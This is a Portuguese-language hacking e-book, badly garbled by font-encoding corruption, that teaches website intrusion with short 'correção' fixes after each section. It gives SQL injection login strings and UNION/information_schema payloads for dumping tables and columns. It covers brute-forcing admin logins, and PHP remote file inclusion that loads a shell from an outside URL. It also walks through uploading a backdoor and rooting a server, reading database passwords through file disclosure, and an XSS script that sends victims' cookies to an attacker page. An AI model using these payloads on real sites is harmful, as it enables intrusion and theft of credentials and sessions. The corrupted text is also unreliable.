O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. 'ste e - ook tem como o(eti)o n$o s* a in)as$o" como tam!m a pre)en#$o e corre#$o em sites da internet. 1 Passo: +ara se ,a&er a in)as$o ! necess-rio descorir ,a%has ou rechas" .ue ,aci%item a intrus$o" para isso usaremos scanners. NMAP: /canner de ips" onde ,aremos o ,ingerprint ACUNETIX: /canner de ,a%has" onde scannearemos o site em usca de ,a%has. FingerPrint: A.ui uscaremos ,a%has no ser)idor" atra)!s de programas desatua%i&ados. Agora digitamos o comando nmap IP -s0 -O --)ersion-intensit1 2 para iniciar o 3ingerprint" se ne%e aparecer programas antigos" de)emos procurar e4p%oits" um e4emp%o de pes.uisa no goog%e seria: '4p%oit Apache 5.6 . 7orma%mente e%es ser$o nas %inguagens C" +8+" +'9:" +;T8O7" entre outros. 7o :inu4 asta digitar um comando no termina%" e4emp%o: perl e4p%.p% . Eu no achei nada e a!ora" Ca%ma" n$o nos demos por )encidos ainda" agora )amos achar )u%nerai%idades no site. Correo: <antenha sempre os programas atua%i&ados" ou %igue para seu host noti,icando o programa )u%ner-)e% e pe#a corre#$o. Scan: 7essa etapa )amos usar o scanner no)amente" s* .ue desta )e& o de )u%nerai%idades" no nosso caso o Acuneti4. O Acuneti4 ! para =indows" mas )oc> pode tentar emu%a-%o no wine ou procurar um programa sustituto para :inu4. Caso ha(a a%guma ,a%ha de)emos e4p%ora-%a" o .ue nos %e)a ao pr*4imo passo. Robots.txt: 'ste ar.ui)o da ordens para os uscadores e as )e&es re)e%a ,icheiros ocu%tos o de administra#$o. 7orma%mente este te4to ,ica na pasta principa% do site e4: www.site.com/roots.t4t . 'nt$o procuramos os ar.ui)os .ue est$o dissa%ow. Ex: User-agent: Googlebot Disallow: /admin 'nt$o )amos nesse diret*rio" ! a area administrati)e do site" n*s podemos e4p%orar do seguinte modo: Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. SQL Injection Basico: 'sse tipo de ata.ue e4p%ora uma ,a%ha no /?:. 8- casos em .ue o programador se distrai e escre)e o c*digo )u%ner-)e%" .ue entrando com as sctrings: C#di!o $ulner%vel: &ista de Strin!s @magem imasters.com.r %ogin: AorB6 ou AorCDB senha: AorB6 ou AorCDB A or A6EDB6 A or 6D6 AorCDB A or AaBDFa AG or HAaBDFa Correo:
6- Co%ocar magicI.uotesIgcp para On Com esta op#$o ser- co%ocado um escape antes dos HFG nos parJmetros: -COOK@' -+O/T -L'T 5- Msar m1s.%Irea%IescapeIstringHG 3a& escape nas strings m1s.%I.uer1 usadas N- 0a%idar os parJmetros en)iados pe%os usu-rios $usuarioIid D HintG$IL'TOFusuarioIidFPQ O $usuarioIid ser- sempre um integer e poderemos contro%ado os dados en)iados pe%os usu-rios.
Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. Brute-Force: A t!cnica Rrute-3orce chuta o %ogin e a senha .ue est$o em uma %ista at! acertar. 'ssas %istas Hword%istsG podem chegar a giga1tes" ou se(a" mi%hSes e mi%hSes de %ogins e senhas. Tois programas muito nusados s$o o Rrutus H=indowsG e o T8C 81dra H:inu4G: Tutoria% Rrutus Correo: Rom" )amos usa-%o para o .ue n*s .ueremos" entrar na -rea admin. T1pe: Co%o.ue o tipo de cone4$o .ue .ueremos .uerar" 8ttp Rasic ! para p-ginas n$o aseadas em ,ormu%-rios. 8ttp 3orm ! para p-ginas aseadas em ,ormu%-rios. Mse Msername: <ar.ue se ,or pedido nome de usu-rio. /ing%e Mser: <ar.ue se )oc> u.er pegar a senha de s* um usu-rio. Mser 3i%e: Onde esta o %ista de %ogins. +ositi)e Authentcation 9esu%ts: <ostra as senhas .ue )oc> pegou. Tutoria% 81dra: http://www.1outue.com/watchU)D@%K6VTg5oTw
+ara %o.uear esse ata.ue de)emos %imitar o numero de sumits .ue cada usu-rio pode ,a&er:
WUphp $paginaD$IL'TOXpaginaXPQ // Autor: Tanie% de /ousa 7ascimento //0eri,ica se a string passada possui a%gum trecho in)a%ido //Caso tenha mostra uma mensagem de erro i,HeregiHXhttpYwwwY,tpY.datY.t4tYwgetX" $paginaGG Z echo XOps[ +ro%emas na p-gina[XQ ///e a )aria)e% passada esti)er dentro das normas" e4ecuta o e%se aai4o: \e%seZ i,H[empt1H$paginaGG Z @inc%ude HX$pagina.phpXGQ \e%seZ @inc%ude HXcapa.phpXGQ \ \ U] 'epois de e(plorar a %rea administrativa do site vamos )uscar mais *U+S Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. PHP Injection: +8+ @n(ection ou 9emote 3i%e @nc%usion e4p%ora o uso incorreto da ,un#$o inc%ude no +8+. C#di!o $ulner%vel: 'm um site )u%ner-)e% podemos inc%uir um e4p%oit" podendo ,a&er um de,ace" ou at! ownar. <?php $pagina=$_GET!pagina!"# in$l%de&$pagina' ?( '4emp%o: http://phpin(.noads.i&/inde4.phpUpaginaD " in(etamos uma she%% assim: http://phpin(.noads.i&/inde4.phpUpaginaDhttp://she%%.com /c^^.t4t " o resu%tado seria: C#di!o Se!uro: <?php $pagina=$_GET!pagina!"# // )%tor: Daniel de *o%sa +as$im ento i,&eregi&!http-www- ,tp-.dat-.txt-wget!/ $pagina'' 0 e$ho !1ps2 3roblemas na p4gina 2!#5else0 i,&2empt6&$pagina'' 0 7in$l%de &!$pagina.php!'# 5else0 7in$l%de &!$apa.php!'# 5 5 ?( , -ue .a/er se no tenho permiss0es" 0oc> de)e ir ao caminho /tmp/" %- norma%mente h-" ,a#a up%oad de uma ackdoor" ,a%aremos de%a no pr*4imo capitu%o. Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. Backdoor: Rackdoor Htam!m conhecido por +orta dos ,undosG ! uma ,a%ha de seguran#a .ue pode e4istir em um programa de computador ou sistema operaciona%" .ue pode permitir a in)as$o do sistema por um cracker para .ue e%e possa oter um tota% contro%e da m-.uina. <uitos crackers uti%i&am-se de um Rackdoor para insta%ar )_rus de computador ou outros programas ma%iciosos" conhecidos como ma%ware. Wikipdia 7esse tutoria% )ou ensinar a pegar o r``t no %inu4. O pessoa% (- de)e ter a%gum conhecimento em Te,acer e (- ter uma /he%% Mpada no /er)idor. Ok ent$o )amos %-. :emrando" )oc> precisa ter acesso para ,a&er o up%oad de um ackdoor. 3a#a o up%oad do )ac1door. E(ecute o comando: chmod aaa ackdoor H7o caso ackdoor ! o ar.ui)o upado" se )oc> upou com nome de F %o% F )oc> precisa dar o comando F chmod aaa %o% G A!ora e(ecute o comando: ./ackdoor H7ome do Rackdoor" igua% citado a cimaG @r- aparecer a porta da cmd H/he%%G e )ai mostrar a )ers$o do kerne% e se tem 4%p pra )ers$o. Agora pegue o ip do Servidor. A)ra o CM' e di!ite: ping -t www.ositeaserrootado.com.r Ara o Putt2 e co%o.ue o @+ e a porta mostrada na she%%. Agora )oc> est- conectado a she%% upada no /er)idor. Agora ! s* rodar o 4%p da )ers$o " e4ecute pe%a she%% mesmo. Tepois de ter achado o 4%p para )ers$o" ,a#a o up%oad de%e pe%a she%% e: E(ecute: cd/)ar/tmp Htmp ! um diret*rio" poderia ser .ua%.uer outroG wget 4p%.p% H+oderia ser .ua%.uer outro nome" esse ar.ui)o ! o 4%p" ,a#a o up%oad de%eG depois chmod 4%p.p% ./4p% r``ted. Agora )oc> tem acesse tota%. 0oc> pode encontrar o 4%p para )ers$o em www.mi%w`rm.com Autor: 3E(pl4it5 Correo: Mse sempre um om Anti)_rus e um 3irewa%%" pois e%a ser- incapacitada pe%o 3irewa%% e remo)ida pe%o Anti)_rus. Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. Loca Fie !iscosure: C#di!o $ulner%vel: :oca% 3i%e Tisc%osure ou :3T permite )er os ar.ui)os do sistema" em como seus WUphp // +ostado por A%%<eida $ar.ui)oD $IL'TOFar.ui)oFPQ $read,i%eD read,i%eH$ar.ui)oGQ U] c*digos-,onte. 'u gra)ei esta )_deo au%a: http://www.1outue.com/watchU)DA1+)bcaciVc " mas )ou ,a&er um tutoria% para )oc>s. /e )oc> ,i&er arir uma pagina com o c*digo ,onte WUphp echoX9ona%doXQ U] no na)egador )ai aparecer apenas 9ona%do. Atra)!s dessa ,a%ha e%e )ai mostrar WUphp echoX9ona%doXQ U] ent$o n*s )amos ,a&er com .ue mostre as senhas" ao pegarmos uma p-gina igua% d do c*digo )u%ner-)e% in(etamos o c*digo pagina.phpUar.ui)oDadmin/inde4.php e )eremos o c*digo ,onte" norma%mente e%e )ai ,a&er uma cone4$o com o anco de dados e e4iira a%go como WUphp inc%udeHFconectar.phpFGQ U] ent$o )amos na p-gina conectar.php" in(etando e%e no)amente pagina.phpUar.ui)oDadmin/inde4.php e ent$o e%e ira e4iir o %ogin para o anco de dados" e4emp%o: 'nt$o temos todos os dados para entrar no anco de dados" asta %ogar no site" pe%o +8+<1Admin" .uase todos os ser)ers tem: www.site.com.r/phpm1admin ou www.site.com.r/pma. 8- )-rios (eitos de se e4p%orar essa )u%nerai%idade" o outro seria se a pagina de administra#$o n$o ,osse com anco de dados" ai apareceria: Sistema de &o!in Sem *anco de 'ados WUphp i,H $%ogin [D nomeIadmin YY $senha [D senhaIadmin G Z ///e ,or di,irente" retonar a mensagem: echo X:ogin e senha incorretosXQ ///e ,or iguais os dados" corretos" aparece a p-gina: \e%seZ %ogado U] 'm .ue o nome de usu-rio seria: nomeIadmin e senha: senhaIadmin. P%!ina 'e Cone(o Com *anco 'e 'ados WUphp $host D X%oca%hostXQ $user D XnomeIdoIusuarioXQ $senha D XsenhaIdoIusuarioXQ $dname D XnomeIdoIdXQ //conecta ao anco de dados m1s.%IconnectH$host" $user" $senhaG or dieHXerroXGQ //se%eciona o anco de dados m1s.%Ise%ectIdH$dnameGor dieHXerroXGQ U] Correo: +ostado por A%%<eida WUphp i, H$IL'TOFar.ui)oFPDD Xprincipa%XGZ read,i%eHXprincipa%.phpXGQ \ e%seZ echoHXWcenter]W]A#$o 7$o +ermitidaW/]W/center]XGQ \ U] Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. "ross Site Scri#ting: C// ou e// roua cookies e permiti usa-%os como se ,osse o usu-rio origina% da.ue%e cookie. 7este artigo do site: http://www.inw-seguranca.com/wordpress/UpD^64 " h- dois )ideos de como e4p%orar esta )u%nerai%idade" mas a.ui )ai um tutoria%: Xss para redirecionar: A%guns sites possuem murais" ou comentarios .ue permitem 8T<:" ne%es ao digitar o c*digo: Wscript t1peDXte4t/(a)ascriptX] window.%ocation.hre,DXhttp://seusitehack.comXQ W/script] 'nt$o ao )er a p-gina e%e sera redirecionado para http://seusitehack.com Ao rou)ar coo1ies para o sistema voc6 e o usu%rio ori!inal Xss Para 7ou)o de Coo1ies: Ao digitar (a)ascript:a%ertHFdocument.cookieFGQ ira aparecer uma mensagem e4iindo seus cookies" n*s .ueremos receer os do admin" ent$o iremos criar uma p-gina php .ue nos mande: WUphp $cookieD$IL'TOFcookieFPQ// 3a&emos um L'T UcookieD . $%aga%%etaD,openHXcookies.t4tX"FaFGQ// /a%)amos como cookies.t4t n$o es.ue#a de cria8lo5 ,writeH$%aga%%eta"XCookie:fnX.htm%entitiesH$cookieG.Xfnfn fnfnXGQ ,c%oseH$%aga%%etaGQ echoXWscript]%ocation.hre,DFhttp://goog%e.com/FQW/script]XQ// 9edirecionamos para o goog%e" )oce pode muda-%o U] 'nt$o )amos testa-%a" escre)a a%gum comentario" ou ,a#a um post" assim: Wscript]document.%ocationDXhttp://%oca%host/ataac/inde4.phpU cookieDX g document.cookieW/script] Agora no ar.ui)o cookies.t4t )ai aparecer a%go assim: te4to6 D te4to5 e4: cookieD admin Para in9etar o coo1ie do administrador use o c#di!o: 9avascript:voidHdocument.cookieD XcookieD adminXGQ
7esultado: 7osso cookie esta igua% o do admin" para o sistema n*s somos e%e" por isso conseguimos os pri)i%!gios. Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. S$ Injection %&an'ado:
@73O9<AT@O7I/C8'<A Como (- e4p%i.uei para )oc>s" agora iremos capturar do anco de dados as tae%as e as co%unas do anco de dados de um site ,ict_cio. /upomos .ue temos a seguinte not_cias: www.site.com.r/noticias.phpUidD62 c- )imos .ue e%e est- )u%ner-)e% a /?: @n(ection e possui b co%unas. Agora iremos descorir as tae%as do site atra)!s do in,ormationIschema" o contedo de nossa materia[ +ara isto iremos uti%i&ar um union: www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"5"N"4"2"bg3romg@n,ormationI/chema.Ta%es 7otem .ue apareceram a%guns nmeros na te%a" no nosso caso: 5"2"N Agora )amos ,a&er o seguinte" no %ugar destes nmeros iremos co%ocar as tae%as do in,ormationIschema" adicionando um h%imiteC: http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"ta%eIname"N"4"2"bg3romg@n,ormationI/chema.Ta%esg%imit `"6 Agora )oc> )ai aumentando o %imite para 6"6 / 5"6 / N"6 / 4"6 at! encontrar a%guma tae%a tipo: admin" usuarios" user" memros. administradores" dIadmin" dIadmin etci 0amos supor agora .ue encontramos a tae%a husuariosC em 5`"6: http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"ta%eIname"N"4"2"bg3romg@n,ormationI/chema.Ta%esg%imit 5`"6 Agora iremos achar as co%unas da tae%a husuariosC: http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"Co%umnIname"N"4"2"bg3romg@n,ormationI/chema.Co%umnsg=here Ta%e.nameDBusuariosBg%imitg`"6 H:emrando .ue este m!todo n$o ,uncionar- se e4istir ,i%tragem magic .uote no siteG Caso a ,i%tragem este(a ati)a poderemos uti%i&ar assim e )er uma por uma: http://www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"Co%umnIname"N"4"2"bg3romg@n,ormationI/chema.Co%umnsg%imitg`"6 ' ent$o ir procurando at! encontrar as co%unas: senha" usuario" username" %ogin" password" user" emai% etc CO7C:M/jO 7este tutoria% ensinei )oc>s a descorirem as tae%as e as co%unas de um anco de dados uti%i&ando o in,ormationIschema[ Com este m!todo )oc> n$o ! origado a ir chutando nomes de tae%as e co%unas at! encontrar e%a" ou uti%i&ar a%gum programa espec_,ico. 0oc> ,a& manua%mente. A_ est- a )erdadeira arte do /?: @n(ection[ 'sta mat!ria eu ,i& agora" n$o e%aorei muito" ent$o se hou)er a%gum erro a)isem hehehe 'spero .ue todos tenham gostado e .ue e%a se(a astante ti%[ Tam!m comp%ementando outro m!todo .ue n$o co%o.uei na mat!ria: www.site.com.r/noticias.phpUidD-62gMniong/e%ectg6"LroupIConcatHTa%eI7ameG"N"4"2"bg,romgin,ormationIschema.ta%esgwheregta%eIschemaDdataaseHG Assim ir$o ser %istadas as tae%as Autor: rahac1/in Invaso e Correo em Sites Autor: $4mu:kt http://www.inw-seguranca.com Twitter: @inwseguranca O Contedo deste e ook ! somente para conhecimento" e corre#$o" n$o nos responsai%i&amos pe%o seu mau uso. "oncus(o: A.ui aprendemos a%gumas ,a%has e ata.ues" mas tamem como nos proteger" mas ,i.ue atento" no)as )u%nerai%idades e ,a%has aparecem a cada minuto" por isso este(a em constante procura. Origado a todos .ue %eram esse e-ook" espero ter sido uti%" e at! a pr*4ima QG
Para sa)er mais entre em: http:::;;;5in;8se!uranca5com